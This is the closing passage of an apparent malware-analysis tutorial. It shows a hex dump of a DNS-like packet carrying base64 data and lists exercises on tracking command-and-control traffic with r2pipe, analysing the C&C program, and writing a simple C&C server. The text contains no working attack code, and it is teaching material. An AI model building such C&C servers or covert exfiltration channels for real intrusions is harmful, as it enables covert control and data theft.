00000020 67 59 57 78 70 63 58 56 68 4c 69 42 56 0a 00 00 gYWxpcXV hLiBV...
00000030 10 00 01 ...
00000000 1f fc 81 82 00 01 00 00 00 00 00 00 21 64 43 42 ........ ....!dCB
00000010 6b 62 32 78 76 63 6d 55 67 62 57 46 6e 62 6d 45 kb2xvcmU gbWFnbmE
00000020 67 59 57 78 70 63 58 56 68 4c 69 42 56 0a 00 00 gYWxpcXV hLiBV...
00000030 10 00 01 ...
Aaaaaaand we are doneee
Now it’s your turn to play with this one here are the recommended exercises for you:
- Make a simple script with r2pipe that keeps track of CandC commands and also for retrieving files and reconstructing them for the b64 program
- Modify / analyze the C&C program to figure out about that mysterious func
- Code a simple C&C server for those